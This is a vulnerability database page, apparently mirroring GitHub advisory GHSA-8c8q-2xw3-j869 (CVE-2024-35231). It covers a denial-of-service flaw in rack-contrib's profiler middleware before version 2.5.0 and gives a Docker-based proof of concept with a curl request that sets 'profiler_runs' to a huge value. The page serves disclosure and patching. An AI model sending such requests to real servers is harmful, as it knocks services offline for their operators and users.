Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-8c8q-2xw3-j869

Опубликовано: 28 мая 2024
Источник: github
Github: Прошло ревью
CVSS3: 8.6

Описание

rack-contrib vulnerable to Denial of Service due to the unconstrained value of the incoming "profiler_runs" parameter

Summary

The next ruby code is vulnerable to denial of service due to the fact that the user controlled data profiler_runs was not contrained to any limitation. Which would lead to allocating resources on the server side with no limitation (CWE-770).

runs = (request.params['profiler_runs'] || @times).to_i result = @profile.profile do runs.times { @app.call(env) } end

An exploit as such curl --fail "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time" may cause resource exhaution by a remotely controlled value.

PoC

Herein the config.ru file:

require 'rack' require 'rack/contrib' use Rack::Profiler # if ENV['RACK_ENV'] == 'development' # Define a Rack application app = lambda do |env| # Your application logic goes here [200, {}, ["Hello World"]] end # Run the Rack application run app

A Dockerfile:

# Use the official Ruby image as a base FROM ruby:latest # Set the working directory inside the container WORKDIR /app # Copy the custom config.ru file into the container COPY config.ru . COPY Gemfile . # Install rack and the gems needed to run the app RUN bundle install # Expose the port that rackup will listen on EXPOSE 9292 # Run rackup when the container starts ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"] # Health check HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1

A Gemfile

source 'https://rubygems.org' gem 'rack', '~> 2.0' gem 'rack-contrib', '~> 2.4' gem 'rackup' gem 'ruby-prof'

A Docker compose

services: app: build: context: . ports: - "9292:9292"

To run the PoC

docker compose up --build

To exploit DoS:

curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"

Impact

  • Potential denial of service by remotely user-controlled data.

Ссылки

Пакеты

Наименование

rack-contrib

rubygems
Затронутые версииВерсия исправления

< 2.5.0

2.5.0

EPSS

Процентиль: 33%
0.00131
Низкий

8.6 High

CVSS3

CVE ID

CVE-2024-35231

Дефекты

CWE-770

Связанные уязвимости

ubuntu логотип

CVE-2024-35231

CVSS3: 8.6
ubuntu
больше 1 года назад

rack-contrib provides contributed rack middleware and utilities for Rack, a Ruby web server interface. Versions of rack-contrib prior to 2.5.0 are vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not constrained to any limitation. This would lead to allocating resources on the server side with no limitation and a potential denial of service by remotely user-controlled data. Version 2.5.0 contains a patch for the issue.

nvd логотип

CVE-2024-35231

CVSS3: 8.6
nvd
больше 1 года назад

rack-contrib provides contributed rack middleware and utilities for Rack, a Ruby web server interface. Versions of rack-contrib prior to 2.5.0 are vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not constrained to any limitation. This would lead to allocating resources on the server side with no limitation and a potential denial of service by remotely user-controlled data. Version 2.5.0 contains a patch for the issue.

debian логотип

CVE-2024-35231

CVSS3: 8.6
debian
больше 1 года назад

rack-contrib provides contributed rack middleware and utilities for Ra ...

EPSS

Процентиль: 33%
0.00131
Низкий

8.6 High

CVSS3

CVE ID

CVE-2024-35231

Дефекты

CWE-770